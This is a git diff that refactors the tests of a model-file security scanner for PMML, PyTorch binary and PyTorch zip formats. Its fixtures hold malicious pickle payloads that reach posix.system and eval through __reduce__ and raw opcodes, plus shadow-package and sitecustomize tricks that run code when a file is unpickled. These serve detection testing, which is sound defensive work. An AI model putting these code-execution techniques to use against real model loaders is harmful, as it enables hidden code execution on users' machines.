all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(str(issue.details.get("attribute", "")).endswith("}reference") for issue in external_issues) @@ -560,9 +480,7 @@ def test_pmml_scanner_documentation_file_urls_still_warn(tmp_path: Path) -> None """ path = tmp_path / "documented_file_refs.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] assert external_issues @@ -580,13 +498,9 @@ def test_pmml_scanner_resource_url_attributes_still_warn(tmp_path: Path) -> None """ path = tmp_path / "resource_attr.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(issue.details.get("attribute") == "source" for issue in external_issues) @@ -600,13 +514,9 @@ def test_pmml_scanner_non_documentation_reference_attribute_still_warns(tmp_path """ path = tmp_path / "reference_attr.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(issue.details.get("attribute") == "reference" for issue in external_issues) @@ -622,13 +532,9 @@ def test_pmml_scanner_application_reference_outside_header_still_warns(tmp_path: """ path = tmp_path / "application_reference_outside_header.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(issue.details.get("attribute") == "reference" for issue in external_issues) @@ -642,13 +548,9 @@ def test_pmml_scanner_namespaced_resource_url_attributes_warn(tmp_path: Path) -> """ path = tmp_path / "namespaced_resource_attr.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(str(issue.details.get("attribute", "")).endswith("}href") for issue in external_issues) @@ -662,13 +564,9 @@ def test_pmml_scanner_schema_location_urls_warn(tmp_path: Path) -> None: """ path = tmp_path / "schema_location.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(str(issue.details.get("attribute", "")).endswith("}schemaLocation") for issue in external_issues) @@ -681,13 +579,9 @@ def test_pmml_scanner_namespaced_documentation_element_urls_warn(tmp_path: Path) """ path = tmp_path / "namespaced_doc_element.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(str(issue.details.get("tag", "")).endswith("}annotation") for issue in external_issues) @@ -699,13 +593,9 @@ def test_pmml_scanner_namespaced_documentation_attribute_urls_warn(tmp_path: Pat """ path = tmp_path / "namespaced_doc_attribute.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(str(issue.details.get("attribute", "")).endswith("}label") for issue in external_issues) @@ -878,9 +768,7 @@ def test_pmml_scanner_comment_doctype_is_not_xxe(tmp_path: Path) -> None:
""" path = tmp_path / "commented_doctype.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any( @@ -896,9 +784,7 @@ def test_pmml_scanner_cdata_doctype_is_not_xxe(tmp_path: Path) -> None:
""" path = tmp_path / "cdata_doctype.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any( @@ -915,9 +801,7 @@ def test_pmml_scanner_deep_extension_tree_does_not_recurse_forever(tmp_path: Pat """ path = tmp_path / "deep_extension.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert result.bytes_scanned > 0 @@ -931,9 +815,7 @@ def test_pmml_scanner_extension_text_truncation_with_hidden_payload_is_inconclus """ path = tmp_path / "truncated_extension.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is False assert any("exceeds the safe inspection node limit" in issue.message for issue in result.issues) @@ -956,9 +838,7 @@ def test_pmml_scanner_benign_extension_truncation_is_not_a_security_finding(tmp_ """ path = tmp_path / "benign_padded_extension.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is False assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME @@ -1030,9 +910,7 @@ def test_pmml_scanner_metadata_tracking(tmp_path: Path) -> None:
""" path = tmp_path / "metadata_test.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success # Check metadata is properly set @@ -1042,3 +920,15 @@ def test_pmml_scanner_metadata_tracking(tmp_path: Path) -> None: assert result.metadata["pmml_version"] == "4.4" assert isinstance(result.metadata["has_defusedxml"], bool) assert result.bytes_scanned > 0 + + +def _scan_pmml_fixture(path: Path, pmml: str) -> ScanResult: + path.write_text(pmml, encoding="utf-8") + return PmmlScanner().scan(str(path)) + + +def _external_resource_issues(result: ScanResult) -> list[Issue]: + external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] + assert external_issues + assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + return external_issues diff --git a/tests/scanners/test_pytorch_binary_scanner.py b/tests/scanners/test_pytorch_binary_scanner.py index 497815962..2cc8d945d 100644 --- a/tests/scanners/test_pytorch_binary_scanner.py +++ b/tests/scanners/test_pytorch_binary_scanner.py @@ -1,5 +1,6 @@ import builtins import struct +from functools import partial from pathlib import Path from typing import Any @@ -10,17 +11,9 @@ from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.pytorch_binary_scanner import PyTorchBinaryScanner from tests.helpers import create_mock_onnx +from tests.helpers.file_creators import write_chunk_boundary_payload - -def _write_chunk_boundary_payload( - path: Path, - pattern: bytes, - *, - prefix_len: int, - suffix: bytes = b"\x00" * 128, -) -> None: - chunk_size = 1024 * 1024 - path.write_bytes(b"\x00" * (chunk_size - prefix_len) + pattern[:prefix_len] + pattern[prefix_len:] + suffix) +_write_chunk_boundary_payload = partial(write_chunk_boundary_payload, suffix=b"\x00" * 128) def _valid_elf64_header() -> bytes: @@ -548,9 +541,7 @@ def test_pytorch_binary_scanner_ignores_invalid_mz_after_first_chunk(tmp_path: P chunk_size = 1024 * 1024 binary_file.write_bytes(b"\x00" * (chunk_size + 512) + b"MZ" + b"\x00" * 128) - result = scanner.scan(str(binary_file)) - - assert not any(issue.rule_code == "S501" and "Windows executable" in issue.message for issue in result.issues) + _assert_no_signature(scanner, binary_file, "Windows executable") def test_pytorch_binary_scanner_ignores_late_elf_magic_without_valid_header(tmp_path: Path) -> None: @@ -558,9 +549,7 @@ def test_pytorch_binary_scanner_ignores_late_elf_magic_without_valid_header(tmp_ chunk_size = 1024 * 1024 binary_file.write_bytes(b"\xff" * (chunk_size + 512) + b"\x7fELF" + b"\xff" * 128) - result = PyTorchBinaryScanner().scan(str(binary_file)) - - assert not any(issue.rule_code == "S501" and "Linux executable" in issue.message for issue in result.issues) + _assert_no_signature(PyTorchBinaryScanner(), binary_file, "Linux executable") def test_pytorch_binary_scanner_detects_late_little_endian_macho32(tmp_path: Path) -> None: @@ -585,9 +574,7 @@ def test_pytorch_binary_scanner_ignores_late_macho_magic_without_valid_header(tm chunk_size = 1024 * 1024 binary_file.write_bytes(b"\xff" * (chunk_size + 512) + b"\xce\xfa\xed\xfe" + b"\xff" * 128) - result = PyTorchBinaryScanner().scan(str(binary_file)) - - assert not any(issue.rule_code == "S501" and "Mach-O" in issue.message for issue in result.issues) + _assert_no_signature(PyTorchBinaryScanner(), binary_file, "Mach-O") def test_pytorch_binary_scanner_defers_ml_context_without_executable_candidates( @@ -650,9 +637,7 @@ def test_pytorch_binary_scanner_ignores_invalid_late_shebang_alias(tmp_path: Pat chunk_size = 1024 * 1024 binary_file.write_bytes(b"\x00" * (chunk_size + 512) + b"#!/bin/not-an-interpreter\n" + b"\x00" * 128) - result = scanner.scan(str(binary_file)) - - assert not any(issue.rule_code == "S501" and "Shell script shebang" in issue.message for issue in result.issues) + _assert_no_signature(scanner, binary_file, "Shell script shebang") def test_pytorch_binary_scanner_detects_late_shebang_across_chunk_boundary_once(tmp_path: Path) -> None: @@ -690,39 +675,11 @@ def test_pytorch_binary_scanner_coalesces_late_shebang_aliases(tmp_path: Path) - def test_pytorch_binary_scanner_reconsiders_carried_shebang_under_new_chunk_context(tmp_path: Path) -> None: - scanner = PyTorchBinaryScanner() - binary_file = tmp_path / "carried_shebang_context.bin" - chunk_size = 1024 * 1024 - shebang = b"#!/bin/bash\n" - shebang_offset = chunk_size - 20 - binary_file.write_bytes(b"\x00" * shebang_offset + shebang + b"\x00" * (20 - len(shebang)) + b"\xff" * 1024) - - result = scanner.scan(str(binary_file)) - - shebang_issues = [ - issue for issue in result.issues if issue.rule_code == "S501" and "Shell script shebang" in issue.message - ] - assert len(shebang_issues) == 1 - assert shebang_issues[0].details["signature"] == b"#!/".hex() - assert shebang_issues[0].details["offset"] == shebang_offset + _assert_carried_pytorch_shebang(tmp_path, ("carried_shebang_context.bin"), (b"\x00"), (b"\x00")) def test_pytorch_binary_scanner_deduplicates_carried_shebang(tmp_path: Path) -> None: - scanner = PyTorchBinaryScanner() - binary_file = tmp_path / "carried_shebang.bin" - chunk_size = 1024 * 1024 - shebang = b"#!/bin/bash\n" - shebang_offset = chunk_size - 20 - binary_file.write_bytes(b"\xff" * shebang_offset + shebang + b"\xff" * (20 - len(shebang)) + b"\xff" * 1024) - - result = scanner.scan(str(binary_file)) - - shebang_issues = [ - issue for issue in result.issues if issue.rule_code == "S501" and "Shell script shebang" in issue.message - ] - assert len(shebang_issues) == 1 - assert shebang_issues[0].details["signature"] == b"#!/".hex() - assert shebang_issues[0].details["offset"] == shebang_offset + _assert_carried_pytorch_shebang(tmp_path, ("carried_shebang.bin"), (b"\xff"), (b"\xff")) def test_pytorch_binary_scanner_ignores_invalid_late_shebang_interpreter_subpath(tmp_path: Path) -> None: @@ -731,9 +688,7 @@ def test_pytorch_binary_scanner_ignores_invalid_late_shebang_interpreter_subpath chunk_size = 1024 * 1024 binary_file.write_bytes(b"\xff" * (chunk_size + 512) + b"#!/bin/bash/not-an-interpreter\n" + b"\xff" * 128) - result = scanner.scan(str(binary_file)) - - assert not any(issue.rule_code == "S501" and "Shell script shebang" in issue.message for issue in result.issues) + _assert_no_signature(scanner, binary_file, "Shell script shebang") @pytest.mark.skip( @@ -876,3 +831,29 @@ def test_pickle_scanner_handles_pickle_bin_files(tmp_path): result = scanner.scan(str(pickle_bin)) assert result.success assert result.bytes_scanned > 0 + + +def _assert_carried_pytorch_shebang(tmp_path: Path, filename: str, prefix_byte: bytes, padding_byte: bytes) -> None: + scanner = PyTorchBinaryScanner() + binary_file = tmp_path / filename + chunk_size = 1024 * 1024 + shebang = b"#!/bin/bash\n" + shebang_offset = chunk_size - 20 + binary_file.write_bytes( + prefix_byte * shebang_offset + shebang + padding_byte * (20 - len(shebang)) + b"\xff" * 1024 + ) + + result = scanner.scan(str(binary_file)) + + shebang_issues = [ + issue for issue in result.issues if issue.rule_code == "S501" and "Shell script shebang" in issue.message + ] + assert len(shebang_issues) == 1 + assert shebang_issues[0].details["signature"] == b"#!/".hex() + assert shebang_issues[0].details["offset"] == shebang_offset + + +def _assert_no_signature(scanner: PyTorchBinaryScanner, binary_file: Path, description: str) -> None: + result = scanner.scan(str(binary_file)) + + assert not any(issue.rule_code == "S501" and description in issue.message for issue in result.issues) diff --git a/tests/scanners/test_pytorch_zip_scanner.py b/tests/scanners/test_pytorch_zip_scanner.py index 3e8056b8e..023a69a55 100644 --- a/tests/scanners/test_pytorch_zip_scanner.py +++ b/tests/scanners/test_pytorch_zip_scanner.py @@ -14,10 +14,12 @@ import zipfile import zlib from collections.abc import Iterator +from functools import partial from importlib import metadata as importlib_metadata from pathlib import Path from types import ModuleType from typing import IO, Any, BinaryIO, cast +from unittest.mock import create_autospec import pytest from modelaudit_picklescan.api import _source_backed_import_requires_initialization_proof @@ -35,7 +37,6 @@ from modelaudit.detectors import network_comm as network_comm_module from modelaudit.detectors.suspicious_symbols import CVE_COMBINED_PATTERNS from modelaudit.scanner_results import ( - ACTIONABLE_FAILED_CHECKS_METADATA_KEY, INCONCLUSIVE_SCAN_OUTCOME, MEMBER_FILE_HASHES_METADATA_KEY, MEMBER_FILE_HASHES_OMITTED_METADATA_KEY, @@ -56,6 +57,45 @@ RepositoryFileInventory, ) from tests.helpers import create_mock_pytorch_zip +from tests.helpers.cache import private_actionable_failed_checks as _private_actionable_failed_checks +from tests.helpers.file_creators import EvalPayload +from tests.helpers.file_creators import ( + pickle_binunicode as _pickle_binunicode, +) +from tests.helpers.file_creators import pickle_binunicode as _pickle_binunicode_bytes +from tests.helpers.file_creators import pickle_short_binunicode as _pickle_short_binunicode +from tests.helpers.file_creators import pickle_short_binunicode as _pickle_short_binunicode_bytes +from tests.helpers.pickle_framework import ( + _assert_shadow_framework_unpickle_executes, + _binary_magic_tensor_storage_bytes, + _clear_ultralytics_modules, + _float_storage_element_count_for_bytes, + _force_framework_metadata_unresolved, + _frame_first_large_malicious_eval_pickle_payload, + _frame_first_raw_storage_bytes, + _large_proto0_system_payload, + _pickle_binint, + _pickle_int_tuple, + _pickleish_tensor_storage_bytes, + _pytorch_storage_protocol0_persistent_id_payload, + _pytorch_storage_then_arbitrary_protocol0_persistent_id_payload, + _require_torch_distribution, + _shadow_framework_divergence_cases, + _shadow_newobj_build_payload, + _shadow_slot_state_build_payload, + _static_getattr_protocol0_unicode_payload, + _write_cross_module_rebind_target_package, + _write_enum_trusted_transformers_package, + _write_import_side_effect_transformers_package, + _write_init_heavy_trusted_transformers_package, + _write_init_inert_setstate_transformers_package, + _write_rebindable_trusted_torch_utils_package, + _write_rebindable_trusted_transformers_package, + _write_runtime_mutable_trusted_transformers_package, + _write_sitecustomize_trusting_site_packages, + _yolov5n6_tensor_storage_prefix_bytes, +) +from tests.helpers.scanners import track_bytesio_close _ASSETS_DIR = Path(__file__).resolve().parents[1] / "assets" _HF_T10_REPO_ID = "nvidia/LocateAnything-3B" @@ -94,26 +134,10 @@ def _pickle_global(module: str, name: str) -> bytes: return b"c" + module.encode("ascii") + b"\n" + name.encode("ascii") + b"\n" -def _pickle_binunicode(value: bytes) -> bytes: - return b"X" + len(value).to_bytes(4, "little") + value - - def _pickle_binunicode8(value: bytes) -> bytes: return b"\x8d" + len(value).to_bytes(8, "little") + value -def _pickle_short_binunicode(value: bytes) -> bytes: - if len(value) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(value)]) + value - - -def _pickle_binint(value: int) -> bytes: - if 0 <= value <= 0xFF: - return b"K" + bytes([value]) - return b"J" + value.to_bytes(4, "little", signed=True) - - def _proto0_string_literal(value: bytes) -> bytes: literal = value.decode("latin-1").encode("unicode_escape").replace(b"'", b"\\'") return b"S'" + literal + b"'\n." @@ -127,11 +151,6 @@ def _pickle_frame(payload: bytes) -> bytes: return b"\x95" + struct.pack(" int: - assert len(data) % 4 == 0 - return len(data) // 4 - - def _float_storage_persistent_id_payload_for_bytes(key: str | bytes, data: bytes) -> bytes: return _pytorch_storage_persistent_id_payload( key, @@ -139,19 +158,6 @@ def _float_storage_persistent_id_payload_for_bytes(key: str | bytes, data: bytes ) -def _pickle_int_tuple(values: tuple[int, ...]) -> bytes: - payload = b"".join(_pickle_binint(value) for value in values) - if len(values) == 0: - return b")" - if len(values) == 1: - return payload + b"\x85" - if len(values) == 2: - return payload + b"\x86" - if len(values) == 3: - return payload + b"\x87" - return b"(" + payload + b"t" - - def _metadata_reduce_payload(module: str, name: str, value: bytes = b"metadata") -> bytes: return _pickle_global(module, name) + _pickle_binunicode(value) + b"\x85R" @@ -250,286 +256,6 @@ def _write_training_args_bin(path: Path, payload: bytes) -> None: zip_file.writestr("training_args/.data/serialization_id", "0" * 40) -_SHADOW_FRAMEWORK_MODULE = "transformers.training_args" -_SHADOW_FRAMEWORK_NAME = "TrainingArguments" - - -def _force_framework_metadata_unresolved(monkeypatch: pytest.MonkeyPatch) -> None: - monkeypatch.setattr( - "modelaudit_picklescan.call_graph._trusted_module_origin_kind", - lambda _module_name: "unresolved", - ) - monkeypatch.setattr("modelaudit_picklescan.call_graph._resolve_module_source", lambda _module_name: None) - monkeypatch.setattr( - "modelaudit_picklescan.call_graph._find_module_spec_without_imports", - lambda _module_name: None, - ) - - -def _stack_global_reference_payload(protocol: int) -> bytes: - return ( - bytes((0x80, protocol)) - + _pickle_short_binunicode(_SHADOW_FRAMEWORK_MODULE.encode("ascii")) - + b"\x94" - + _pickle_short_binunicode(_SHADOW_FRAMEWORK_NAME.encode("ascii")) - + b"\x94\x93" - ) - - -def _shadow_newobj_build_payload(protocol: int = 4) -> bytes: - return _stack_global_reference_payload(protocol) + b")\x81}b." - - -def _shadow_memo_alias_payload() -> bytes: - return _stack_global_reference_payload(4) + b"\x94" + b"0" + b"h\x02)\x81}b." - - -def _shadow_newobj_ex_payload() -> bytes: - return _stack_global_reference_payload(4) + b")}\x92}b." - - -def _shadow_slot_state_build_payload() -> bytes: - return ( - _stack_global_reference_payload(4) - + b")\x81N}" - + _pickle_short_binunicode(b"payload") - + _pickle_short_binunicode(b"owned") - + b"s\x86b." - ) - - -def _bytes_literal_payload(payload: bytes) -> bytes: - return b"\x80\x04B" + len(payload).to_bytes(4, "little") + payload + b"." - - -def _extension_reconstruction_payload(opcode: bytes, encoded_code: bytes) -> bytes: - return b"\x80\x04" + opcode + encoded_code + b")\x81}b." - - -def _shadow_framework_divergence_cases() -> tuple[object, ...]: - nested = _shadow_newobj_build_payload(4) - return ( - pytest.param("protocol4_stack_global", _shadow_newobj_build_payload(4), "single", None, id="protocol4"), - pytest.param("protocol5_stack_global", _shadow_newobj_build_payload(5), "single", None, id="protocol5"), - pytest.param("memo_alias", _shadow_memo_alias_payload(), "single", None, id="memo-alias"), - pytest.param("newobj_ex", _shadow_newobj_ex_payload(), "single", None, id="newobj-ex"), - pytest.param("slot_state_build", _shadow_slot_state_build_payload(), "single", None, id="slot-state-build"), - pytest.param("nested_stream", _bytes_literal_payload(nested), "nested", None, id="nested"), - pytest.param("concatenated_stream", b"\x80\x04N." + nested, "concatenated", None, id="concatenated"), - pytest.param("ext1_control", _extension_reconstruction_payload(b"\x82", b"\x01"), "single", 1, id="ext1"), - pytest.param( - "ext2_control", - _extension_reconstruction_payload(b"\x83", (256).to_bytes(2, "little")), - "single", - 256, - id="ext2", - ), - pytest.param( - "ext4_control", - _extension_reconstruction_payload(b"\x84", (70_000).to_bytes(4, "little")), - "single", - 70_000, - id="ext4", - ), - ) - - -def _write_shadow_transformers_package(package_root: Path, marker: Path) -> None: - package_dir = package_root / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "from pathlib import Path", - f"_MARKER = Path({str(marker)!r})", - "class TrainingArguments:", - " __slots__ = ('payload',)", - " def __new__(cls, *args, **kwargs):", - " return object.__new__(cls)", - " def __setstate__(self, state):", - " _MARKER.write_text('setstate', encoding='utf-8')", - " def __setattr__(self, name, value):", - " _MARKER.write_text(f'setattr:{name}', encoding='utf-8')", - " object.__setattr__(self, name, value)", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_init_inert_setstate_transformers_package(site_packages: Path, marker: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - f"MARKER = {str(marker)!r}", - "class TrainingArguments:", - " def __new__(cls, *args, **kwargs):", - " return object.__new__(cls)", - " def __setstate__(self, state):", - " with open(MARKER, 'w', encoding='utf-8') as handle:", - " handle.write('setstate')", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_import_side_effect_transformers_package(site_packages: Path, marker: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - f"MARKER = {str(marker)!r}", - "with open(MARKER, 'w', encoding='utf-8') as handle:", - " handle.write('import')", - "class OptimizerNames:", - " pass", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_rebindable_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "class TrainingArguments:", - " def __new__(cls):", - " return object.__new__(cls)", - "", - "class OptimizerNames:", - " def __new__(cls, value=''):", - " return object.__new__(cls)", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_init_heavy_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "HELPER = object()", - "class TrainingArguments:", - " def __new__(cls):", - " return object.__new__(cls)", - " def __init__(self):", - " self.helper = HELPER", - " def __setstate__(self, state):", - " self.__dict__.update(state)", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_enum_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "trainer_utils.py").write_text( - "\n".join( - [ - "from enum import Enum", - "class IntervalStrategy(str, Enum):", - " STEPS = 'steps'", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_rebindable_trusted_torch_utils_package(site_packages: Path) -> None: - package_dir = site_packages / "torch" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "_utils.py").write_text( - "\n".join( - [ - "def _rebuild_tensor(arg):", - " return None", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_cross_module_rebind_target_package(site_packages: Path) -> None: - (site_packages / "trusted_target.py").write_text( - "\n".join( - [ - "from pathlib import Path", - "def rebound_optimizer(path):", - " Path(path).write_text('cross-module', encoding='utf-8')", - " return None", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_runtime_mutable_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "def OptimizerNames(value, callback=None):", - " if callback is not None:", - " return callback(value)", - " return None", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_sitecustomize_trusting_site_packages(customize_dir: Path, site_packages: Path) -> None: - customize_dir.mkdir(parents=True, exist_ok=True) - (customize_dir / "sitecustomize.py").write_text( - "\n".join( - [ - "import sysconfig", - f"_TRUSTED_SITE_PACKAGES = {str(site_packages)!r}", - "_ORIGINAL_GET_PATH = sysconfig.get_path", - "def _patched_get_path(name, scheme=None, vars=None, expand=True):", - " if name in {'purelib', 'platlib'}:", - " return _TRUSTED_SITE_PACKAGES", - " if scheme is None and vars is None and expand is True:", - " return _ORIGINAL_GET_PATH(name)", - " return _ORIGINAL_GET_PATH(name, scheme=scheme, vars=vars, expand=expand)", - "sysconfig.get_path = _patched_get_path", - "", - ] - ), - encoding="utf-8", - ) - - def _preimport_rebound_subprocess_env(tmp_path: Path, site_packages: Path) -> dict[str, str]: customize_dir = tmp_path / "sitecustomize" _write_sitecustomize_trusting_site_packages(customize_dir, site_packages) @@ -549,45 +275,6 @@ def _preimport_rebound_subprocess_env(tmp_path: Path, site_packages: Path) -> di return {**os.environ, "PYTHONPATH": pythonpath} -def _assert_shadow_framework_unpickle_executes( - payload_path: Path, - tmp_path: Path, - *, - mode: str, - extension_code: int | None, -) -> None: - marker = tmp_path / f"{payload_path.stem}.marker" - package_root = tmp_path / f"{payload_path.stem}.shadow" - _write_shadow_transformers_package(package_root, marker) - code_arg = "none" if extension_code is None else str(extension_code) - script = ( - "import copyreg, io, pickle, sys\n" - "from pathlib import Path\n" - "payload = Path(sys.argv[1]).read_bytes()\n" - "mode = sys.argv[2]\n" - "code_arg = sys.argv[3]\n" - "if code_arg != 'none':\n" - " copyreg.add_extension('transformers.training_args', 'TrainingArguments', int(code_arg))\n" - "if mode == 'nested':\n" - " pickle.loads(pickle.loads(payload))\n" - "elif mode == 'concatenated':\n" - " stream = io.BytesIO(payload)\n" - " while stream.tell() < len(payload):\n" - " pickle.load(stream)\n" - "else:\n" - " pickle.loads(payload)\n" - ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), mode, code_arg], - check=False, - env={**os.environ, "PYTHONPATH": str(package_root)}, - capture_output=True, - text=True, - ) - assert completed.returncode == 0, completed.stderr - assert marker.exists() - - def _download_hf_file( tmp_path: Path, *, @@ -675,19 +362,11 @@ def _corrupt_zip_member_crc(zip_path: Path, member_name: str) -> None: def _malicious_eval_pickle_payload() -> bytes: - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (eval, ("print('pwned')",)) - - return pickle.dumps({"payload": MaliciousClass()}) + return pickle.dumps({"payload": EvalPayload()}) def _large_framed_malicious_eval_pickle_payload() -> bytes: - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (eval, ("print('pwned')",)) - - return pickle.dumps({"pad": b"A" * 10_000, "payload": MaliciousClass()}, protocol=4) + return pickle.dumps({"pad": b"A" * 10_000, "payload": EvalPayload()}, protocol=4) def _large_length_prefixed_malicious_eval_pickle_payload() -> bytes: @@ -702,30 +381,10 @@ def _malicious_proto0_system_payload() -> bytes: return b"cposix\nsystem\n(S'echo hidden'\ntR." -def _large_proto0_system_payload() -> bytes: - return b"cposix\nsystem\n(S'" + (b"A" * 10_000) + b"'\ntR." - - def _protocol_less_framed_malicious_storage_payload() -> bytes: return b"cposix\nsystem\n(S'echo hidden'\ntR" + b"\x95" + struct.pack(" bytes: - benign_prefix = b"N0" * 2100 - dangerous_suffix = b"cbuiltins\neval\n(S'print(1)'\ntR." - body = benign_prefix + dangerous_suffix - payload = b"\x95" + len(body).to_bytes(8, "little") + body - assert payload[0] == 0x95 - assert int.from_bytes(payload[1:9], "little") > 4 * 1024 - assert payload.find(b"cbuiltins\neval\n") > 4 * 1024 - assert payload.rfind(b".") > 4 * 1024 - return payload - - -def _frame_first_raw_storage_bytes() -> bytes: - return b"\x95" + (10_000).to_bytes(8, "little") + (b"\x00" * 4095) - - def _short_binunicode(data: bytes) -> bytes: assert len(data) < 256 return b"\x8c" + bytes([len(data)]) + data + b"\x94" @@ -799,31 +458,6 @@ def _pytorch_rebuild_tensor_v2_payload() -> bytes: ) -def _pytorch_storage_protocol0_persistent_id_payload( - key: str, - *, - storage_qualname: str = "torch.FloatStorage", - size: int | str = 1, -) -> bytes: - return f"(dp0\nVx\np1\nP('storage', , '{key}', 'cpu', {size})\ns.".encode("ascii") - - -def _pytorch_storage_then_arbitrary_protocol0_persistent_id_payload(key: str) -> bytes: - payload = _pytorch_storage_protocol0_persistent_id_payload(key) - assert payload.endswith(b".") - return payload[:-1] + b"Parbitrary-storage-key\n0." - - -def _private_actionable_failed_checks(scan_result: dict[str, Any]) -> list[dict[str, Any]]: - private_metadata = scan_result.get("_private_metadata") - if not isinstance(private_metadata, dict): - return [] - actionable_failed_checks = private_metadata.get(ACTIONABLE_FAILED_CHECKS_METADATA_KEY) - if not isinstance(actionable_failed_checks, list): - return [] - return [entry for entry in actionable_failed_checks if isinstance(entry, dict)] - - def _pytorch_storage_persistent_id_sequence_payload( keys: list[str], *, @@ -1062,24 +696,6 @@ def _fake_byte_storage_persistent_id_payload(key: str) -> bytes: ) -def _pickleish_tensor_storage_bytes() -> bytes: - # Minimal prefix from pinned PiD raw tensor storage that looks like a pickle FRAME crossing STOP. - return bytes.fromhex("478727be61f70dbd70953cbd09b996bd5c7a2ebe") + (b"\x00" * 128) - - -def _yolov5n6_tensor_storage_prefix_bytes() -> bytes: - # First 64 bytes of Ultralytics/YOLOv5 yolov5n6.pt archive/data/195 at - # revision 